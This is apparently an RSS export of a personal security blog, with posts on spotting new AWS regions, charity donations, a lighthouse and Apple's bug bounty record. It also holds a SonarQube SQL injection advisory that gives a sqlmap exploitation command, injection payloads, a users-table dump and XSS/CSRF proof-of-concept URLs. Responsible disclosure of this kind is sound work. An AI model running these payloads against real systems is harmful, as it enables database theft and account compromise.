<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Nils Juenemann]]></title><description><![CDATA[SRE Manager, Go Developer, Photographer, interested in Web application security. Working for Exaring AG.]]></description><link>https://www.nilsjuenemann.de/</link><image><url>https://www.nilsjuenemann.de/favicon.png</url><title>Nils Juenemann</title><link>https://www.nilsjuenemann.de/</link></image><generator>Ghost 5.26</generator><lastBuildDate>Sun, 01 Jan 2023 12:31:51 GMT</lastBuildDate><atom:link href="https://www.nilsjuenemann.de/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[New AWS region: eu-west-2]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>Two years ago I&apos;ve <a href="https://www.nilsjuenemann.de/2014/07/04/new-aws-region-eu-central-in-germany/">leaked</a> the <em>eu-central-1</em> in Frankfurt. Today I found the first hints for a new region called <strong>eu-west-2</strong>.</p>
<p>There are already API endpoints with a valid DNS record and a correct TLS subject in the certificate reachable:</p>
<pre><code>$ timeout 1 openssl s_client -connect ec2.eu-west-2.</code></pre>]]></description><link>https://www.nilsjuenemann.de/2016/10/14/new-aws-region-eu-west-2/</link><guid isPermaLink="false">63b173b1da1141cc2bec4737</guid><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Fri, 14 Oct 2016 12:36:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>Two years ago I&apos;ve <a href="https://www.nilsjuenemann.de/2014/07/04/new-aws-region-eu-central-in-germany/">leaked</a> the <em>eu-central-1</em> in Frankfurt. Today I found the first hints for a new region called <strong>eu-west-2</strong>.</p>
<p>There are already API endpoints with a valid DNS record and a correct TLS subject in the certificate reachable:</p>
<pre><code>$ timeout 1 openssl s_client -connect ec2.eu-west-2.amazonaws.com:443 2&gt;&amp;1 |grep subject
subject=/C=US/ST=Washington/L=Seattle/O=Amazon.com, Inc./CN=ec2.eu-west-2.amazonaws.com
</code></pre>
<p>This region is located is somewhere located in the UK. Based on latency it&apos;s in the metro region London.</p>
<p><img src="https://d0.awsstatic.com/global-infrastructure/maps/Global_Infrastructure_kwV20.png" alt="regions" loading="lazy"></p>
<p>From a host located in London we have a latency to this region between 1-3ms.</p>
<pre><code>Packets               Pings
Host                                                                                                                     Loss%   Snt   Last   Avg  Best  Wrst StDev
1. router1-lon.linode.com                                                                                                 0.0%    15    0.7   0.7   0.6   1.2   0.0
2. 109.74.207.0                                                                                                           0.0%    15    0.9   1.6   0.7   2.4   0.4
3. 109.74.207.9                                                                                                           0.0%    15    2.6   1.1   0.8   2.6   0.5
4. 195.66.225.175                                                                                                         0.0%    14    1.4   2.6   1.3  15.2   3.6
5. 178.236.3.51                                                                                                           0.0%    14    2.6   3.2   2.5   7.0   1.2
6. 178.236.3.22                                                                                                           0.0%    14    3.4   2.9   2.5   4.5   0.3
7. 54.239.101.136                                                                                                         0.0%    14   24.1  15.4   5.3  24.1   5.6
8. 52.94.33.127                                                                                                           0.0%    14    2.6   2.7   2.5   3.5   0.0
9. 52.94.33.12                                                                                                            0.0%    14    3.6   4.0   2.3   7.1   1.8
10. ???
11. ???
12. ???
13. ???
14. 52.94.48.63                                                                                                            0.0%    14    2.3   2.3   2.1   2.9   0.0
</code></pre>
<p>The AWS Cloud operates today 35 Availability Zones within 13 geographic Regions around the world.</p>
<p><a href="https://aws.amazon.com/about-aws/global-infrastructure/">AWS</a> says that 5 more Regions will come through the next year. <strong>eu-west-2</strong> is probably launching in the next weeks.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[$2.674 from Google for a solar plant in Tanzania]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>In January 2015, Google launched an experimental program called <a href="https://www.google.com/about/appsecurity/research-grants/">Vulnerability Research Grants</a> to complement the long-running Vulnerability Reward Program, with the goal of rewarding security researchers who verify the security of Google products and services, even in the case when no vulnerabilities are found.</p>
<p>As a regular reporter to the</p>]]></description><link>https://www.nilsjuenemann.de/2015/03/02/solar-power-for-a-girls-school-in-tanzania/</link><guid isPermaLink="false">63b172f1da1141cc2bec4710</guid><category><![CDATA[security]]></category><category><![CDATA[google]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Mon, 02 Mar 2015 15:43:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>In January 2015, Google launched an experimental program called <a href="https://www.google.com/about/appsecurity/research-grants/">Vulnerability Research Grants</a> to complement the long-running Vulnerability Reward Program, with the goal of rewarding security researchers who verify the security of Google products and services, even in the case when no vulnerabilities are found.</p>
<p>As a regular reporter to the VRP, I was rewarded with a <strong>$1.337 USD</strong> Grant on the 5th of February, which I appreciated a lot.</p>
<p>Google offers the option to donate your grant to an established charity. If you do so, they will double the donation.</p>
<p>I&apos;ve decided to donate this Grant to the non-profit organization <a href="http://www.ingenieure-ohne-grenzen.org/de/Regionalgruppen/Berlin/Projekte/Elektrifizierung-der-Baramba-Girls-Secondary-School">Ingenieure ohne Grenzen</a> (Engineers without borders).</p>
<p><a href="https://www.betterplace.org/en/projects/10780-solar-power-for-a-girls-school-in-tanzania"><img src="https://www.nilsjuenemann.de/content/images/2023/01/screenshot-2015-03-02-at-17-27-30.png" alt="donation" loading="lazy"></a></p>
<h4 id="building-a-solar-power-plant">Building a solar power plant</h4>
<p>Since the price of diesel is growing constantly and the supply of diesel generators is unreliable, the energy supply for the Baramba Girls Secondary School (northern Tanzania, close to the borders with Uganda, Rwanda and Burundi), is no longer guaranteed.</p>
<h4 id="about-the-baramba-girls-school">About the baramba girls school</h4>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/screenshot-2015-03-02-at-18-09-12.png" alt="map" loading="lazy"></p>
<p>The Berlin regional group of the relief organization Engineers Without Borders wants to provide the school with a <strong>solar plant</strong>, which is optimal to ensure constant energy supply, considering the local climatic conditions.</p>
<p>The campus of the Baramba Girls Secondary School is home to 200 students, who are between 14 and 17 years old. Currently, the energy supply is provided by an old generator, which runs on diesel. With the energy provided, the dormitories and the teachers&#x2019; rooms are lit for an hour as a maximum, and even this is very unreliable. Because the school is located near the Equator, it gets dark at about 6 p.m. The computer classroom with 21 computers is supplied with energy only for several hours a week. The diesel price has been growing constantly during the last year, so that the energy supply of the school has been reduced to a minimum.</p>
<p>In many regions of Tanzania people still can&apos;t afford the cost of tuition for the education of their kids. If a family happens to have the possibility to finance the school for one child, they usually prefer to let their sons go to school, so that the can get a better job and be able to support their own family in the future. Furthermore, most of the public schools are boys schools. Therefore, it is particularly important to give the girls an opportunity to benefit from higher education and to prevent the gender discrimination.</p>
<p>Unfortunately, the fundraising for this project is not completed yet, so if you want to support the Baramba Girls School, please donate via <a href="https://www.betterplace.org/en/projects/10780-solar-power-for-a-girls-school-in-tanzania/donations/new#wcp">Betterplace</a> or directly to <a href="https://www.ingenieure-ohne-grenzen.org/de/Helfen-Spenden/Spenden">Engineers without borders</a> (german).</p>
<p>In the last years I&apos;ve donated regularly some of the rewards from Google&apos;s VRP to different schools in Africa to improve the schooling conditions of the local people.</p>
<h3 id="2012">2012</h3>
<ul>
<li>$2600 USD for a <a href="https://www.nilsjuenemann.de/2012/04/26/ethiopia-gets-new-school-thanks-to-xss/">school in in Welkite</a> (Ethiopia)</li>
</ul>
<h3 id="2013">2013</h3>
<ul>
<li>$1.000 USD for a <a href="https://www.nilsjuenemann.de/2013/01/31/xss-bei-google-insgesamt-4600-fuer-schulen-in-afrika/">kindergarten in Tomegb&#xE9;</a> (Togo)</li>
<li>$1.000 USD for a <a href="https://www.nilsjuenemann.de/2012/04/26/ethiopia-gets-new-school-thanks-to-xss/">primary school in Ilketunjo</a> (Ethiopia)</li>
</ul>
<h3 id="2015">2015</h3>
<ul>
<li>$2.674 USD for a secondary girls school in Tanzania</li>
</ul>
<p>The total amount donated is now <strong>$7.274 USD</strong>. Thank you, Google Security Team, for making this donations possible.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Rubjerg Knude Lighthouse]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>In 1994 I was the first time at Rubjerg Knude. This lighthouse is located on the coast of the North Sea in Rubjerg, in the Jutland municipality of Hj&#xF8;rring.</p>
<p>At this time I bought my first analog camera - a small analog <a href="http://en.wikipedia.org/wiki/Advanced_Photo_System">APS</a> camera. Unfortunately I can&apos;</p>]]></description><link>https://www.nilsjuenemann.de/2015/03/01/rubjerg-knude-lighthouse/</link><guid isPermaLink="false">63b17284da1141cc2bec46f5</guid><category><![CDATA[dronevideo]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Sun, 01 Mar 2015 19:46:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>In 1994 I was the first time at Rubjerg Knude. This lighthouse is located on the coast of the North Sea in Rubjerg, in the Jutland municipality of Hj&#xF8;rring.</p>
<p>At this time I bought my first analog camera - a small analog <a href="http://en.wikipedia.org/wiki/Advanced_Photo_System">APS</a> camera. Unfortunately I can&apos;t remember the brand.</p>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/Scan-105.jpeg" alt="1994" loading="lazy"></p>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/Scan-104.jpeg" alt="1994" loading="lazy"></p>
<p>Both shifting sands and coastal erosion are a serious problem in the area. The coast is eroded on average 1.5 metres a year. Built around 1250, the church was originally 1 kilometre from the coast, but was dismantled in 2008 to prevent its falling into the sea.</p>
<p>Last year I went with my brother again to the Rubjerg Knude Lighthouse and I made this aerial footage with a Gopro Hero3 and a DJI Phantom 2:</p>
<div class="flex-video">
<iframe width="560" height="315" <iframe id="ytplayer" type="text/html" src="https://www.youtube.com/embed/Qi4w-WQsl30?modestbranding=1&amp;showinfo=0&amp;color=white&amp;theme=light" frameborder="0" allowfullscreen></iframe></div>
<p>By 2009, the small buildings were severely damaged by the pressure of the sand and were later removed. It is expected that the tower will fall into the sea by 2023.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[How secure is Apple?]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>Since 2005 Apple has been listing all responsible disclosed vulnerabilities (web application security) on a dedicated page. There are in total 435 bugs listed, reported by hundreds of individuals.</p>
<p>In 2011 I&apos;ve already made a posting about vulnerabilities I&apos;ve found in Apple&apos;s sites. This</p>]]></description><link>https://www.nilsjuenemann.de/2014/09/02/how-secure-is-apple/</link><guid isPermaLink="false">63b171ceda1141cc2bec46d7</guid><category><![CDATA[security]]></category><category><![CDATA[apple]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Tue, 02 Sep 2014 11:14:00 GMT</pubDate><media:content url="https://www.nilsjuenemann.de/content/images/2023/01/broken-imac.jpeg" medium="image"/><content:encoded><![CDATA[<!--kg-card-begin: markdown--><img src="https://www.nilsjuenemann.de/content/images/2023/01/broken-imac.jpeg" alt="How secure is Apple?"><p>Since 2005 Apple has been listing all responsible disclosed vulnerabilities (web application security) on a dedicated page. There are in total 435 bugs listed, reported by hundreds of individuals.</p>
<p>In 2011 I&apos;ve already made a posting about vulnerabilities I&apos;ve found in Apple&apos;s sites. This posting was called <a href="http://www.nilsjuenemann.de/2011/11/11/apple-com-xss-gallery/">Apple XSS Gallery</a> and I remember there was a lot of buzz around. (Posting was #1 on HN for a while).</p>
<p>Today I was asking myself if something has changed.</p>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/Screen-Shot-2014-09-03-at-12-24-22.png" alt="How secure is Apple?" loading="lazy"></p>
<p>I&apos;ve found most of the bugs in August 2011 and I&apos;ve published the story in November 2011 after Apple has fixed all issues. I think there are several reasons why the number of submissions has increased. Many big players (Google, Facebook, Paypal, Yandex, GitHub) had started a bug bounty program at this time and have attracted many people to get fame and some <strong>$$$</strong>.</p>
<h3 id="14-sql-injections-and-5-remote-code-executions">14 SQL Injections and 5 Remote Code Executions</h3>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/pubchart.png" alt="How secure is Apple?" loading="lazy"></p>
<p>If we assume the list of vulnerabilities is complete, then a total issue count of 435 in the last years is pretty low. Is Apple doing a good job concerning security? I don&apos;t think so. When we compare the numbers with other programs, we can see, that the number of submissions for a rewarded bounty program is much higher. For example Google had 700 paid reports in the first year.</p>
<h3 id="find-my-iphone-api">Find My Iphone API</h3>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/Find-My-iPhone.jpeg" alt="How secure is Apple?" loading="lazy"></p>
<p>I&apos;m sure the missing rate-limit for brute-forcing passwords in the <strong>Find My iPhone API</strong> would have been found if Apple had paid for those bugs.</p>
<p>Apple has a market cap of <strong>$613.76 billion US-Dollar</strong> and isn&apos;t able to introduce a Vulnerability Reward Program like other major Internet companies.</p>
<p>This is sad.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[New AWS region: eu-central-1]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>In March Andy Jassy, senior vice president of Amazon Web Services Unit said to the <a href="http://blogs.wsj.com/cio/2014/03/27/amazon-hints-at-new-german-based-data-center/">Wallstreet Journal</a>, that Germany is &quot;one of the few countries&quot; where customers are asking for a data center &quot;on their own soil&quot;. This news is now 4 month old and it</p>]]></description><link>https://www.nilsjuenemann.de/2014/07/04/new-aws-region-eu-central-in-germany/</link><guid isPermaLink="false">63b17401da1141cc2bec4742</guid><category><![CDATA[amazon]]></category><category><![CDATA[random]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Fri, 04 Jul 2014 13:08:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>In March Andy Jassy, senior vice president of Amazon Web Services Unit said to the <a href="http://blogs.wsj.com/cio/2014/03/27/amazon-hints-at-new-german-based-data-center/">Wallstreet Journal</a>, that Germany is &quot;one of the few countries&quot; where customers are asking for a data center &quot;on their own soil&quot;. This news is now 4 month old and it looks like that a german AWS region is finally arriving.</p>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/CERN_Server_03.jpeg" alt="postimage" loading="lazy"></p>
<p>There are currently 8 public available regions. The region in Germany will be named <strong>eu-central-1</strong>.<br>
The endpoints for all major services are already set up, but network traffic to http or https is blocked.</p>
<table border="0" cellspacing="0" style="border-spacing: 0px; border: 1px solid rgb(204, 204, 204); color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><thead><tr><th style="background-color: #eeeeee; border: 1px solid rgb(204, 204, 204); color: #333333; margin: 0px; padding: 5px; vertical-align: top;">Region Name</th><th style="background-color: #eeeeee; border: 1px solid rgb(204, 204, 204); color: #333333; margin: 0px; padding: 5px; vertical-align: top;">Region</th><th style="background-color: #eeeeee; border: 1px solid rgb(204, 204, 204); color: #333333; margin: 0px; padding: 5px; vertical-align: top;">Endpoint</th></tr></thead><tbody><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">US East (Northern Virginia) Region</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">us-east-1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ec2.us-east-1.amazonaws.com</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">US West (Oregon) Region</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">us-west-2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ec2.us-west-2.amazonaws.com</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">US West (Northern California) Region</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">us-west-1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ec2.us-west-1.amazonaws.com</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">EU (Ireland) Region</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">eu-west-1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ec2.eu-west-1.amazonaws.com</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">Asia Pacific (Singapore) Region</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ap-southeast-1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ec2.ap-southeast-1.amazonaws.com</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">Asia Pacific (Sydney) Region</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ap-southeast-2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ec2.ap-southeast-2.amazonaws.com</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">Asia Pacific (Tokyo) Region</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ap-northeast-1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ec2.ap-northeast-1.amazonaws.com</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">South America (Sao Paulo) Region</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">sa-east-1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ec2.sa-east-1.amazonaws.com</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">Germany (Frankfurt) Region</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">eu-central-1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 0px; padding: 5px; vertical-align: top;">ec2.eu-central-1.amazonaws.com</td></tr></tbody></table>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/aws_logo.png" alt="aws_logo" loading="lazy"></p>
<p>A traceroute to <strong>ec2.eu-central-1.amazonaws.com</strong> is showing us, that the traffic is going to Frankfurt am Main (ffm):</p>
<pre><code>$ traceroute ec2.eu-central-1.amazonaws.comtraceroute to ec2.eu-central-1.amazonaws.com (54.239.54.4), 30 hops max, 60 byte packets&#xA0;
1 &#xA0;vl500.dcata-b16.as6724.net (85.214.1.22) &#xA0;2.426 ms &#xA0;2.410 ms &#xA0;2.390 ms&#xA0;
2 &#xA0;be16.432.core-b2.as6724.net (85.214.0.156) &#xA0;0.342 ms &#xA0;0.340 ms &#xA0;0.327 ms&#xA0;
3 &#xA0;xe-1-2-0.core-b30.as6724.net (85.214.0.69) &#xA0;1.283 ms &#xA0;1.291 ms &#xA0;1.278 ms&#xA0;
4 &#xA0;bei-b2-link.telia.net (213.248.88.89) &#xA0;1.265 ms &#xA0;1.253 ms &#xA0;1.239 ms&#xA0;
5 &#xA0;ffm-bb2-link.telia.net (80.91.254.228) &#xA0;19.178 ms&#xA0;&#xA0;
6 &#xA0;ffm-b10-link.telia.net (213.155.134.137) &#xA0;19.094 ms&#xA0;&#xA0;
7 &#xA0;a100row-ic-306996-ffm-b10.c.telia.net (62.115.46.130) &#xA0;18.829 ms &#xA0;18.818 ms &#xA0;18.807 ms&#xA0;
8 &#xA0;54.239.4.164 (54.239.4.164) &#xA0;20.768 ms 54.239.4.166 (54.239.4.166) &#xA0;20.774 ms 54.239.4.168 (54.239.4.168) &#xA0;19.758 ms
</code></pre>
<p>Let&apos;s see how many days or weeks we have to wait, before we can start migrating services from eu-west-1 to Germany.</p>
<p><strong>Update 2014/07/06:</strong> Since this report Amazon has removed the DNS records for all hosts in the network 53.239.54.0/24 used by eu-central-1 api endpoints.</p>
<p><strong>Update 2014/08/04:</strong> Someone has spotted eu-central-1 in the AWS console:</p>
<blockquote class="twitter-tweet" lang="en"><p>New <a href="https://twitter.com/hashtag/AWS?src=hash">#AWS</a> region eu-central-1 (Germany) spotted in AWS Console! <a href="http://t.co/dD2FPMEX8X">pic.twitter.com/dD2FPMEX8X</a></p>&#x2014; Martin Schayna (@mschayna) <a href="https://twitter.com/mschayna/status/495207161774219264">August 1, 2014</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
<pre><code>$ nmap -p 443 54.239.54.0/24 |grep 54.239.54 | awk &apos;{print $5}&apos;
54.239.54.24
54.239.54.25
54.239.54.27
54.239.54.32
54.239.54.33
54.239.54.35
54.239.54.40
54.239.54.41
54.239.54.43

</code></pre>
<p>But we can still figure out with openssl that we&apos;ve discovered the eu-central-1 site. :-)</p>
<pre><code>$ timeout 1 openssl s_client -connect \
54.239.54.25:443 2&gt;&amp;1 |grep subject

subject=/C=US/ST=Washington/L=Seattle/O=Amazon.com 
Inc./CN=dynamodb.eu-central-1.amazonaws.
</code></pre>
<hr>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[SonarQube/Sonar SQL Injection]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>Last year I found a exploitable boolean-based / AND/OR time-based blind  SQL injection vulnerability in <a href="http://www.sonarqube.org/">Sonatype SonarQube</a> &gt;=<strong>3.4</strong> and &lt;<strong>3.6.1</strong>.</p>
<p>CVSS v2 Vector:&#xA0;<strong>(AV:N/AC:L/Au:N/C:P/I:P/A:C)</strong><br>
Overall Score: <strong>9</strong><br>
SonarQube&#xA0;(formerly&#xA0;Sonar) is</p>]]></description><link>https://www.nilsjuenemann.de/2014/01/13/sonarqube-sql-injection/</link><guid isPermaLink="false">63b1710dda1141cc2bec46b4</guid><category><![CDATA[security]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Mon, 13 Jan 2014 10:22:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>Last year I found a exploitable boolean-based / AND/OR time-based blind  SQL injection vulnerability in <a href="http://www.sonarqube.org/">Sonatype SonarQube</a> &gt;=<strong>3.4</strong> and &lt;<strong>3.6.1</strong>.</p>
<p>CVSS v2 Vector:&#xA0;<strong>(AV:N/AC:L/Au:N/C:P/I:P/A:C)</strong><br>
Overall Score: <strong>9</strong><br>
SonarQube&#xA0;(formerly&#xA0;Sonar) is an&#xA0;open source&#xA0;platform for Continuous Inspection of&#xA0;code quality.</p>
<p>This is the first public advisory of the issue. This advisory additionally includes a list of fixed and undisclosed XSS bugs in <strong>Sonar &gt;=3.5.1</strong>.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>2013-04-31 Filled a bug in Sonar Jira <a href="http://markmail.org/message/ahckqrlnbs3yjmet#query:+page:1+mid:hlhp6zchme57hwm6+state:results">[1]</a></li>
<li>2013-05-01 SQL Injection reported via email to Freddy Mallet from Sonatype&#xA0;</li>
<li>2013-05-07 Bug confirmed by Freddy Mallet&#xA0;</li>
<li>2013-06-24</li>
<li>Simon Brandhof started working on the issue</li>
<li>they planned to fix the bug in August 2013 with version 3.7</li>
<li>Issue silently fixed in their GitHub repo <a href="https://github.com/SonarSource/sonar/commit/08257f901822eba9bc060ea3b9b391f314d13218">[2]</a></li>
<li>I told them that it is a bad idea to have a SQL injection fixed in the code without any advisory for the community.*   2013-06-28 They told me, they release in the next days a new version containing the fix</li>
<li>2013-07-12 Sonar 3.6.1 released without security advisory or any mention of the bug in the Release Notes</li>
</ul>
<p>In the last months they decided to delete the issue from Jira [4]&#xA0;but someone or a automated process added the issue to the OVSDB [5], but without any specific information about the bug.After I figured out, that the bug is fixed in the Sonar GitHub repo I notified a friend from the Apache Software Foundation, because <a href="https://analysis.apache.org">https://analysis.apache.org</a> was running the vulnerable version of Sonar and the site was potentially in risk. Probably that&apos;s the reason why the bug is listed at OVSDB.</p>
<h2 id="sql-injection-details-the-vulnerable-part-is-the-measure-search-function">SQL Injection details&#xA0;The vulnerable part is the measure search function:</h2>
<pre><code>/measures/search?qualifiers%5B%5D=BRC&amp;c1_op=eq&amp;c2_op=eq&amp;c3_op=eq&amp;search=Search
</code></pre>
<p>When we change the <code>qualifiers[]</code> GET parameter to a single&#xA0;back-tick&#xA0;(&apos;), we can see a SQL syntax error in Sonar&apos;s logfile:</p>
<pre><code>2013.05.01 12:34:57 ERROR o.s.MEASURE_FILTER  Fail to execute measure filter: MeasureFilterContext[filter={qualifiers=&apos;|c1_op=eq|c2_op=eq|c3_op=eq|display=list|cols=metric:alert_statusnamedatemetric:nclocmetric:violationslinks|sort=name|asc=true|pageSize=100},sql=SELECT s.id, s.project_id, s.root_project_id, p.long_name FROM snapshots s INNER JOIN projects p ON s.project_id=p.id  WHERE  s.status=&apos;P&apos; AND s.islast=true AND p.copy_resource_id IS NULL  AND s.qualifier IN  (&apos;&apos;&apos;) ,user=&lt;null&gt;]
com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &apos;&apos;&apos;&apos;)&apos; at line 1
</code></pre>
<p>From here it&apos;s easy to exploit:</p>
<pre><code>nils@mac sqlmap]$ ./sqlmap.py -u &apos;http://192.168.4.107:9000/measures/search?qualifiers%5B%5D=BRC&amp;c1_op=eq&amp;c2_op=eq&amp;c3_op=eq&amp;search=Search&apos; -p &apos;qualifiers%5B%5D&apos; --level 3 --risk 3 --sql-shell --dbms=mysql

[..]

GET parameter &apos;qualifiers[]&apos; is vulnerable. 

Do you want to keep testing the others (if any)? [y/N] n

sqlmap identified the following injection points with a total of 173 HTTP(s) requests:

---

Place: GET
Parameter: qualifiers[]&#xA0; &#xA0; 
    Type: boolean-based blind&#xA0; &#xA0; 
    Title: AND boolean-based blind - WHERE or HAVING clause&#xA0; &#xA0;     Payload: qualifiers[]=BRC&apos;) AND 8295=8295 AND (&apos;KiEs&apos;=&apos;KiEs&amp;c1_op=eq&amp;c2_op=eq&amp;c3_op=eq&amp;search=Search&#xA0; &#xA0; 
    
    Type: AND/OR time-based blind&#xA0; &#xA0; 
    Title: MySQL &gt; 5.0.11 AND time-based blind&#xA0; &#xA0; 
    Payload: qualifiers[]=BRC&apos;) AND SLEEP(5) AND (&apos;QxFe&apos;=&apos;QxFe&amp;c1_op=eq&amp;c2_op=eq&amp;c3_op=eq&amp;search=Search
    
---

[14:23:09] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
</code></pre>
<p>Now we have a SQL shell to our database and we can run any query against the database:</p>
<pre><code>[14:23:09] [INFO] calling MySQL shell. To quit type &apos;x&apos; or &apos;q&apos; and press ENTER
sql-shell&gt; select login from users;
[14:23:28] [INFO] fetching SQL SELECT statement query output: &apos;select login from users&apos;
[14:23:28] [WARNING] running in a single-thread mode. Please consider usage of option &apos;--threads&apos; for faster data retrieval
[14:23:28] [INFO] retrieved: 1 the SQL query provided can return 1 entries. How many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit&gt; a

[14:23:32] [INFO] retrieved: adminselect login from users; [1]:[*] adminsql-shell&gt;
</code></pre>
<h2 id="the-fix">The fix</h2>
<pre><code>@@ -210,9 +210,16 @@ private void appendResourceNameCondition(StringBuilder sb) {
    }
  
    private static void appendInStatement(List&lt;String&gt; values, StringBuilder to) {
 -    to.append(&quot; (&apos;&quot;);
 -    to.append(StringUtils.join(values, &quot;&apos;,&apos;&quot;));
 -    to.append(&quot;&apos;) &quot;);
 +    to.append(&quot; (&quot;);
 +    for (int i=0 ; i&lt;values.size() ; i++) {
 +      if (i&gt;0) {
 +        to.append(&quot;,&quot;);
 +      }
 +      to.append(&quot;&apos;&quot;);
 +      to.append(StringEscapeUtils.escapeSql(values.get(i)));
 +      to.append(&quot;&apos;&quot;);
 +    }
 +    to.append(&quot;) &quot;);
    }
</code></pre>
<h2 id="xss-in-sonarsonarqube">XSS in Sonar/SonarQube</h2>
<p>In my discussions with Sonatype I&apos;ve reported a lot of reflective and persistent XSS bugs and issues with missing CSRF tokens to the team. All issues are fixed silently fixed without a release note or a security advisory. I believe everything is fixed in Sonar &gt;=3.7.</p>
<p>Reflective XSS:</p>
<pre><code>/confirm?url=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

/dependencies/index?search=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
/measures/search?qualifiers%5B%5D=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;&amp;c1_op=eq&amp;c2_op=eq&amp;c3_op=eq&amp;search=Search

/reviews/index?review_id=846&amp;statuses%5B%5D=REOPENED&amp;severities%5B%5D=&amp;projects%5B%5D=&amp;author_login=&amp;assignee_login=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&amp;false_positives=without&amp;sort=&amp;asc=false&amp;commit=Search (author_login as well)
</code></pre>
<p>Reflective XSS in POST requests:</p>
<pre><code>POST /roles/projects?qualifier=TRK HTTP/1.1
[..]

q=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;POST /roles/projects?q=c&#xA0;[..]qualifier=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
</code></pre>
<p>Missing CSRF protection with XSS in result:</p>
<pre><code>/groups/create?group%5Bname%5D=&lt;script&gt;alert(1)&lt;/script&gt;&amp;group%5Bdescription%5D=foo&amp;commit=Create

POST /roles/edit_users?redirect=global HTTP/1.1
[..]

